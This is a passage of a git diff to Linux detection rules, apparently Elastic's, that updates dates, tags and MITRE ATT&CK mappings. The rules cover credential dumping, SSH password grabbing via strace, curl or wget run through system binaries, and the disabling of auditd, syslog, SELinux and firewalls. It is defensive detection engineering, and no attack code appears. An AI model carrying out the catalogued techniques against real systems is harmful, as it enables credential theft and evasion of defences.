+108,6 @@ id = "T1110.001" name = "Password Guessing" reference = "https://attack.mitre.org/techniques/T1110/001/" -[[rule.threat.technique.subtechnique]] -id = "T1110.003" -name = "Password Spraying" -reference = "https://attack.mitre.org/techniques/T1110/003/" - [rule.threat.tactic] id = "TA0006" name = "Credential Access" diff --git a/rules/linux/credential_access_proc_credential_dumping.toml b/rules/linux/credential_access_proc_credential_dumping.toml index f543e3ff547..f98a1a25d33 100644 --- a/rules/linux/credential_access_proc_credential_dumping.toml +++ b/rules/linux/credential_access_proc_credential_dumping.toml @@ -2,7 +2,7 @@ creation_date = "2023/04/26" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/17" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -122,11 +122,6 @@ id = "T1003.007" name = "Proc Filesystem" reference = "https://attack.mitre.org/techniques/T1003/007/" -[[rule.threat.technique]] -id = "T1212" -name = "Exploitation for Credential Access" -reference = "https://attack.mitre.org/techniques/T1212/" - [rule.threat.tactic] id = "TA0006" name = "Credential Access" diff --git a/rules/linux/credential_access_sensitive_keys_or_passwords_search_inside_container.toml b/rules/linux/credential_access_sensitive_keys_or_passwords_search_inside_container.toml index 0b636c1f0b6..0085884fa66 100644 --- a/rules/linux/credential_access_sensitive_keys_or_passwords_search_inside_container.toml +++ b/rules/linux/credential_access_sensitive_keys_or_passwords_search_inside_container.toml @@ -2,7 +2,7 @@ creation_date = "2025/03/12" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/17" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -46,14 +46,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = [ - "Domain: Container", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Credential Access", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Container", "OS: Linux", "Use Case: Threat Detection", "Tactic: Credential Access", "Tactic: Discovery", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -117,3 +110,16 @@ reference = "https://attack.mitre.org/techniques/T1552/001/" id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1083" +name = "File and Directory Discovery" +reference = "https://attack.mitre.org/techniques/T1083/" + +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" diff --git a/rules/linux/credential_access_ssh_password_grabbing_via_strace.toml b/rules/linux/credential_access_ssh_password_grabbing_via_strace.toml index feb93587467..d214945e6b9 100644 --- a/rules/linux/credential_access_ssh_password_grabbing_via_strace.toml +++ b/rules/linux/credential_access_ssh_password_grabbing_via_strace.toml @@ -2,7 +2,7 @@ creation_date = "2025/11/10" integration = ["endpoint"] maturity = "production" -updated_date = "2025/11/24" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -56,15 +56,7 @@ references = [ risk_score = 47 rule_id = "9eaa3fb1-3f70-48ed-bb0e-d7ae4d3c8f28" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Credential Access", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Credential Access", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -77,24 +69,11 @@ sequence by host.id with maxspan=3s framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1556" -name = "Modify Authentication Process" -reference = "https://attack.mitre.org/techniques/T1556/" +id = "T1056" +name = "Input Capture" +reference = "https://attack.mitre.org/techniques/T1056/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1554" -name = "Compromise Host Software Binary" -reference = "https://attack.mitre.org/techniques/T1554/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/linux/defense_evasion_apparmor_policy_violation.toml b/rules/linux/defense_evasion_apparmor_policy_violation.toml index 0bdc8dd8329..ba81a129497 100644 --- a/rules/linux/defense_evasion_apparmor_policy_violation.toml +++ b/rules/linux/defense_evasion_apparmor_policy_violation.toml @@ -2,7 +2,7 @@ creation_date = "2026/03/20" integration = ["auditd_manager"] maturity = "production" -updated_date = "2026/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -96,11 +96,6 @@ id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" -[[rule.threat.technique.subtechnique]] -id = "T1562.001" -name = "Disable or Modify Tools" -reference = "https://attack.mitre.org/techniques/T1562/001/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" diff --git a/rules/linux/defense_evasion_attempt_to_disable_auditd_service.toml b/rules/linux/defense_evasion_attempt_to_disable_auditd_service.toml index 6b076f4a605..729612e6179 100644 --- a/rules/linux/defense_evasion_attempt_to_disable_auditd_service.toml +++ b/rules/linux/defense_evasion_attempt_to_disable_auditd_service.toml @@ -2,7 +2,7 @@ creation_date = "2024/08/28" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/17" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -115,9 +115,9 @@ name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" [[rule.threat.technique.subtechnique]] -id = "T1562.001" -name = "Disable or Modify Tools" -reference = "https://attack.mitre.org/techniques/T1562/001/" +id = "T1562.012" +name = "Disable or Modify Linux Audit System" +reference = "https://attack.mitre.org/techniques/T1562/012/" [rule.threat.tactic] id = "TA0005" diff --git a/rules/linux/defense_evasion_attempt_to_disable_iptables_or_firewall.toml b/rules/linux/defense_evasion_attempt_to_disable_iptables_or_firewall.toml index f1d091298b1..13326263087 100644 --- a/rules/linux/defense_evasion_attempt_to_disable_iptables_or_firewall.toml +++ b/rules/linux/defense_evasion_attempt_to_disable_iptables_or_firewall.toml @@ -2,7 +2,7 @@ creation_date = "2023/02/22" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/17" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -123,9 +123,9 @@ name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" [[rule.threat.technique.subtechnique]] -id = "T1562.001" -name = "Disable or Modify Tools" -reference = "https://attack.mitre.org/techniques/T1562/001/" +id = "T1562.004" +name = "Disable or Modify System Firewall" +reference = "https://attack.mitre.org/techniques/T1562/004/" [rule.threat.tactic] id = "TA0005" diff --git a/rules/linux/defense_evasion_attempt_to_disable_syslog_service.toml b/rules/linux/defense_evasion_attempt_to_disable_syslog_service.toml index 716db12a621..3b30d99c0cd 100644 --- a/rules/linux/defense_evasion_attempt_to_disable_syslog_service.toml +++ b/rules/linux/defense_evasion_attempt_to_disable_syslog_service.toml @@ -2,7 +2,7 @@ creation_date = "2020/04/27" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/17" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -132,11 +132,6 @@ id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" -[[rule.threat.technique.subtechnique]] -id = "T1562.001" -name = "Disable or Modify Tools" -reference = "https://attack.mitre.org/techniques/T1562/001/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" diff --git a/rules/linux/defense_evasion_authorized_keys_file_deletion.toml b/rules/linux/defense_evasion_authorized_keys_file_deletion.toml index b1c2b0ae4e9..0f03df2bf50 100644 --- a/rules/linux/defense_evasion_authorized_keys_file_deletion.toml +++ b/rules/linux/defense_evasion_authorized_keys_file_deletion.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/21" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/17" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -80,14 +80,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Impact", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -105,16 +98,11 @@ not ( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1070" -name = "Indicator Removal" -reference = "https://attack.mitre.org/techniques/T1070/" - -[[rule.threat.technique.subtechnique]] -id = "T1070.004" -name = "File Deletion" -reference = "https://attack.mitre.org/techniques/T1070/004/" +id = "T1531" +name = "Account Access Removal" +reference = "https://attack.mitre.org/techniques/T1531/" [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" diff --git a/rules/linux/defense_evasion_base64_decoding_activity.toml b/rules/linux/defense_evasion_base64_decoding_activity.toml index 375a8b62e4e..2374ff50bea 100644 --- a/rules/linux/defense_evasion_base64_decoding_activity.toml +++ b/rules/linux/defense_evasion_base64_decoding_activity.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/21" integration = ["endpoint"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -173,11 +173,6 @@ from logs-endpoint.events.process-* metadata _id, _index, _version [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1027" -name = "Obfuscated Files or Information" -reference = "https://attack.mitre.org/techniques/T1027/" - [[rule.threat.technique]] id = "T1140" name = "Deobfuscate/Decode Files or Information" @@ -187,31 +182,3 @@ reference = "https://attack.mitre.org/techniques/T1140/" id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" - -[[rule.threat.technique]] -id = "T1204" -name = "User Execution" -reference = "https://attack.mitre.org/techniques/T1204/" - -[[rule.threat.technique.subtechnique]] -id = "T1204.002" -name = "Malicious File" -reference = "https://attack.mitre.org/techniques/T1204/002/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/linux/defense_evasion_binary_copied_to_suspicious_directory.toml b/rules/linux/defense_evasion_binary_copied_to_suspicious_directory.toml index 2a3b2c93dca..315be4335f6 100644 --- a/rules/linux/defense_evasion_binary_copied_to_suspicious_directory.toml +++ b/rules/linux/defense_evasion_binary_copied_to_suspicious_directory.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/29" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/17" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -119,11 +119,6 @@ id = "T1036.003" name = "Rename Legitimate Utilities" reference = "https://attack.mitre.org/techniques/T1036/003/" -[[rule.threat.technique]] -id = "T1564" -name = "Hide Artifacts" -reference = "https://attack.mitre.org/techniques/T1564/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" diff --git a/rules/linux/defense_evasion_bpf_program_tampering.toml b/rules/linux/defense_evasion_bpf_program_tampering.toml index f23dcdf2669..50f16c631cf 100644 --- a/rules/linux/defense_evasion_bpf_program_tampering.toml +++ b/rules/linux/defense_evasion_bpf_program_tampering.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/20" integration = ["endpoint", "auditd_manager", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/02/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -99,11 +99,6 @@ id = "T1562.001" name = "Disable or Modify Tools" reference = "https://attack.mitre.org/techniques/T1562/001/" -[[rule.threat.technique]] -id = "T1014" -name = "Rootkit" -reference = "https://attack.mitre.org/techniques/T1014/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" diff --git a/rules/linux/defense_evasion_clear_kernel_ring_buffer.toml b/rules/linux/defense_evasion_clear_kernel_ring_buffer.toml index b3f77d4cefc..736eb093333 100644 --- a/rules/linux/defense_evasion_clear_kernel_ring_buffer.toml +++ b/rules/linux/defense_evasion_clear_kernel_ring_buffer.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/24" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/17" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -117,16 +117,6 @@ id = "T1070.002" name = "Clear Linux or Mac System Logs" reference = "https://attack.mitre.org/techniques/T1070/002/" -[[rule.threat.technique]] -id = "T1562" -name = "Impair Defenses" -reference = "https://attack.mitre.org/techniques/T1562/" - -[[rule.threat.technique.subtechnique]] -id = "T1562.001" -name = "Disable or Modify Tools" -reference = "https://attack.mitre.org/techniques/T1562/001/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" diff --git a/rules/linux/defense_evasion_curl_or_wget_executed_via_lolbin.toml b/rules/linux/defense_evasion_curl_or_wget_executed_via_lolbin.toml index 05fae4d0549..8e8fee50ff4 100644 --- a/rules/linux/defense_evasion_curl_or_wget_executed_via_lolbin.toml +++ b/rules/linux/defense_evasion_curl_or_wget_executed_via_lolbin.toml @@ -2,7 +2,7 @@ creation_date = "2025/11/20" integration = ["endpoint"] maturity = "production" -updated_date = "2025/11/24" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -77,17 +77,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Tactic: Execution", - "Tactic: Command and Control", - "Tactic: Exfiltration", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Resources: Investigation Guide"] type = "eql" query = ''' sequence with maxspan=3s @@ -144,46 +134,25 @@ sequence with maxspan=3s [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Defense Evasion" - id = "TA0005" - reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat.technique]] +id = "T1105" +name = "Ingress Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1105/" - [[rule.threat.technique]] - id = "T1218" - name = "System Binary Proxy Execution" - reference = "https://attack.mitre.org/techniques/T1218/" +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Execution" - id = "TA0002" - reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" - [[rule.threat.technique]] - id = "T1059" - name = "Command and Scripting Interpreter" - reference = "https://attack.mitre.org/techniques/T1059/" - - [[rule.threat.technique.subtechnique]] - name = "Unix Shell" - id = "T1059.004" - reference = "https://attack.mitre.org/techniques/T1059/004/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - - [rule.threat.tactic] - id = "TA0011" - name = "Command and Control" - reference = "https://attack.mitre.org/tactics/TA0011/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - - [rule.threat.tactic] - id = "TA0010" - name = "Exfiltration" - reference = "https://attack.mitre.org/tactics/TA0010/" +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/defense_evasion_directory_creation_in_bin.toml b/rules/linux/defense_evasion_directory_creation_in_bin.toml index 450965c1864..061fea69f52 100644 --- a/rules/linux/defense_evasion_directory_creation_in_bin.toml +++ b/rules/linux/defense_evasion_directory_creation_in_bin.toml @@ -2,7 +2,7 @@ creation_date = "2024/11/01" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/17" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -83,18 +83,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Tactic: Persistence", - "Data Source: Elastic Defend", - "Data Source: Crowdstrike", - "Data Source: SentinelOne", - "Data Source: Elastic Endgame", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Data Source: Crowdstrike", "Data Source: SentinelOne", "Data Source: Elastic Endgame", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -122,11 +111,3 @@ reference = "https://attack.mitre.org/techniques/T1564/001/" id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/linux/defense_evasion_disable_selinux_attempt.toml b/rules/linux/defense_evasion_disable_selinux_attempt.toml index b6e65ea7aca..c2cbb5316e5 100644 --- a/rules/linux/defense_evasion_disable_selinux_attempt.toml +++ b/rules/linux/defense_evasion_disable_selinux_attempt.toml @@ -2,7 +2,7 @@ creation_date = "2020/04/22" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/17" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -125,11 +125,6 @@ id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" -[[rule.threat.technique.subtechnique]] -id = "T1562.001" -name = "Disable or Modify Tools" -reference = "https://attack.mitre.org/techniques/T1562/001/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" diff --git a/rules/linux/defense_evasion_doas_configuration_creation_or_rename.toml b/rules/linux/defense_evasion_doas_configuration_creation_or_rename.toml index 8f0a8af6a0e..ea2413b54ff 100644 --- a/rules/linux/defense_evasion_doas_configuration_creation_or_rename.toml +++ b/rules/linux/defense_evasion_doas_configuration_creation_or_rename.toml @@ -2,7 +2,7 @@ creation_date = "2024/08/28" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/17" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -79,16 +79,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Data Source: Elastic Defend", - "Data Source: Elastic Endgame", - "Data Source: SentinelOne", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Data Source: SentinelOne", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -103,12 +94,20 @@ id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" -[[rule.threat.technique.subtechnique]] -id = "T1548.003" -name = "Sudo and Sudo Caching" -reference = "https://attack.mitre.org/techniques/T1548/003/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/linux/defense_evasion_file_mod_writable_dir.toml b/rules/linux/defense_evasion_file_mod_writable_dir.toml index b838709d6db..5fe58a162db 100644 --- a/rules/linux/defense_evasion_file_mod_writable_dir.toml +++ b/rules/linux/defense_evasion_file_mod_writable_dir.toml @@ -2,7 +2,7 @@ creation_date = "2020/04/21" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/17" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -131,11 +131,15 @@ id = "T1222" name = "File and Directory Permissions Modification" reference = "https://attack.mitre.org/techniques/T1222/" +[[rule.threat.technique.subtechnique]] +id = "T1222.002" +name = "Linux and Mac File and Directory Permissions Modification" +reference = "https://attack.mitre.org/techniques/T1222/002/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [rule.new_terms] field = "new_terms_fields" value = ["host.id", "process.parent.executable", "process.command_line"] diff --git a/rules/linux/defense_evasion_hex_payload_execution_via_commandline.toml b/rules/linux/defense_evasion_hex_payload_execution_via_commandline.toml index 96000cee0bf..7091c85fb0f 100644 --- a/rules/linux/defense_evasion_hex_payload_execution_via_commandline.toml +++ b/rules/linux/defense_evasion_hex_payload_execution_via_commandline.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/29" integration = ["auditd_manager", "crowdstrike", "endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/17" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -84,19 +84,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Tactic: Execution", - "Data Source: Auditd Manager", - "Data Source: Elastic Defend", - "Data Source: Elastic Endgame", - "Data Source: Crowdstrike", - "Data Source: SentinelOne", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Auditd Manager", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Data Source: Crowdstrike", "Data Source: SentinelOne", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -116,40 +104,12 @@ id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" -[[rule.threat.technique]] -id = "T1140" -name = "Deobfuscate/Decode Files or Information" -reference = "https://attack.mitre.org/techniques/T1140/" +[[rule.threat.technique.subtechnique]] +id = "T1027.010" +name = "Command Obfuscation" +reference = "https://attack.mitre.org/techniques/T1027/010/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" - -[[rule.threat.technique]] -id = "T1204" -name = "User Execution" -reference = "https://attack.mitre.org/techniques/T1204/" - -[[rule.threat.technique.subtechnique]] -id = "T1204.002" -name = "Malicious File" -reference = "https://attack.mitre.org/techniques/T1204/002/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/linux/defense_evasion_hex_payload_execution_via_utility.toml b/rules/linux/defense_evasion_hex_payload_execution_via_utility.toml index 62bddb86804..ff3937346a6 100644 --- a/rules/linux/defense_evasion_hex_payload_execution_via_utility.toml +++ b/rules/linux/defense_evasion_hex_payload_execution_via_utility.toml @@ -2,7 +2,7 @@ creation_date = "2024/11/04" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/17" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -128,11 +128,6 @@ not ( [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1027" -name = "Obfuscated Files or Information" -reference = "https://attack.mitre.org/techniques/T1027/" - [[rule.threat.technique]] id = "T1140" name = "Deobfuscate/Decode Files or Information" @@ -151,21 +146,6 @@ id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" - -[[rule.threat.technique]] -id = "T1204" -name = "User Execution" -reference = "https://attack.mitre.org/techniques/T1204/" - -[[rule.threat.technique.subtechnique]] -id = "T1204.002" -name = "Malicious File" -reference = "https://attack.mitre.org/techniques/T1204/002/" - [rule.threat.tactic] id = "TA0002" name = "Execution" diff --git a/rules/linux/defense_evasion_hidden_directory_creation.toml b/rules/linux/defense_evasion_hidden_directory_creation.toml index 59a908829de..aaaaf7ab199 100644 --- a/rules/linux/defense_evasion_hidden_directory_creation.toml +++ b/rules/linux/defense_evasion_hidden_directory_creation.toml @@ -2,7 +2,7 @@ creation_date = "2024/11/01" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -85,17 +85,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Data Source: Elastic Defend", - "Tactic: Persistence", - "Data Source: SentinelOne", - "Data Source: Elastic Endgame", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Data Source: Elastic Endgame", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -131,11 +121,3 @@ reference = "https://attack.mitre.org/techniques/T1564/001/" id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/linux/defense_evasion_hidden_file_dir_tmp.toml b/rules/linux/defense_evasion_hidden_file_dir_tmp.toml index bb71c416c74..bcb12bbfe9a 100644 --- a/rules/linux/defense_evasion_hidden_file_dir_tmp.toml +++ b/rules/linux/defense_evasion_hidden_file_dir_tmp.toml @@ -2,7 +2,7 @@ creation_date = "2020/04/29" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -139,11 +139,3 @@ reference = "https://attack.mitre.org/techniques/T1564/001/" id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/linux/defense_evasion_interactive_shell_from_system_user.toml b/rules/linux/defense_evasion_interactive_shell_from_system_user.toml index 46ad1a21591..c31d30624ef 100644 --- a/rules/linux/defense_evasion_interactive_shell_from_system_user.toml +++ b/rules/linux/defense_evasion_interactive_shell_from_system_user.toml @@ -2,7 +2,7 @@ creation_date = "2024/11/04" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -46,14 +46,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Data Source: Elastic Defend", - "Resources: Investigation Guide" -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Execution", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" query = ''' @@ -124,21 +117,20 @@ In Linux environments, system users are typically non-interactive and serve spec [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -name = "Defense Evasion" -id = "TA0005" -reference = "https://attack.mitre.org/tactics/TA0005/" - [[rule.threat.technique]] -id = "T1564" -name = "Hide Artifacts" -reference = "https://attack.mitre.org/techniques/T1564/" +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" [[rule.threat.technique.subtechnique]] -id = "T1564.002" -name = "Hidden Users" -reference = "https://attack.mitre.org/techniques/T1564/002/" +id = "T1059.004" +name = "Unix 